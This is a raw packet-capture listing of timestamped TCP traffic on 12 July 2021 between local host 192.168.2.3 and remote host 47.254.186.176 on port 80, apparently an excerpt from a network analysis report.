Jul 12, 2021 10:28:46.517003059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517013073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517028093 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517047882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517055988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517080069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517091990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517119884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517128944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517157078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517184019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517208099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517226934 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517230988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517246008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517256021 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517258883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517280102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517291069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517309904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517332077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517344952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517359972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517379999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517389059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517409086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517429113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517437935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517461061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517471075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517492056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517512083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517520905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517541885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517560959 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517573118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517596960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517605066 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517627954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517638922 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517657995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517680883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517692089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517714977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517724991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517745972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517760038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517776012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517797947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517810106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517836094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517844915 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517867088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517885923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517904043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517913103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517939091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517949104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.517971992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.517985106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518007040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518016100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518039942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518049955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518070936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518079996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518104076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518115997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518141985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518152952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518178940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518189907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518214941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518224955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518244982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518259048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518277884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518286943 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518309116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518320084 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518337965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518351078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518371105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518382072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518404961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518419981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518439054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518449068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518472910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518485069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518507957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518517971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518543005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518553019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518575907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518587112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518606901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518615961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518636942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518649101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518663883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518678904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518695116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518707991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518723011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518734932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518753052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518762112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518784046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.518795967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.518830061 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519042015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519064903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519085884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519110918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519151926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519164085 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519192934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519217014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519242048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519248009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519269943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519289970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519320011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519329071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.519412994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519435883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519457102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519479990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519503117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519525051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519546032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.519898891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520042896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520067930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520092010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520127058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520173073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520236015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520257950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520278931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520297050 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520325899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520348072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520375013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520382881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520402908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520418882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520446062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520462990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520484924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520510912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520535946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520559072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520566940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520591974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.520601034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.520629883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521131992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521368980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521409035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521450996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521481991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521639109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521665096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521684885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521698952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521719933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521740913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521749973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521770954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521790981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521816015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521826029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521837950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521859884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521884918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521903038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521919966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521943092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521964073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.521975994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.521998882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522018909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522032022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522057056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522078991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522103071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522119045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522145033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522155046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522181988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522207022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522214890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522238970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522269011 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522443056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522469044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522495985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522502899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522526026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522545099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522559881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522582054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522607088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522620916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522643089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522655010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522677898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522700071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522722006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522743940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522764921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522789955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522828102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522849083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522869110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522877932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522916079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.522936106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.522955894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523004055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.523456097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523489952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523511887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523530960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523557901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.523574114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.523854971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523940086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523969889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.523999929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524007082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524034977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524046898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524074078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524100065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524118900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524137974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524163961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524183989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524198055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524219990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524240971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524261951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524272919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524295092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524305105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524333000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524339914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524365902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524391890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524411917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524426937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524451017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524470091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524485111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524507999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524537086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524547100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524596930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524703979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524789095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524815083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524841070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524847984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524868965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524883986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.524903059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524926901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.524945974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525383949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525443077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525455952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525482893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525509119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525554895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525564909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525589943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525608063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525623083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525648117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525664091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525684118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525708914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525732994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525747061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525774956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525794029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525810957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525835991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525856972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525892973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525918007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525937080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.525957108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.525979042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526002884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526012897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526037931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526056051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526072979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526094913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526113987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526345968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526374102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526398897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526407957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526432037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526458025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526494026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526518106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526535988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526622057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526648045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526669025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526681900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526706934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526721954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526738882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526760101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526781082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526789904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526812077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526834965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526920080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526952982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.526969910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.526998043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527041912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.527213097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527254105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.527297020 CEST	49720	80	192.168.2.3	47.254.186.176
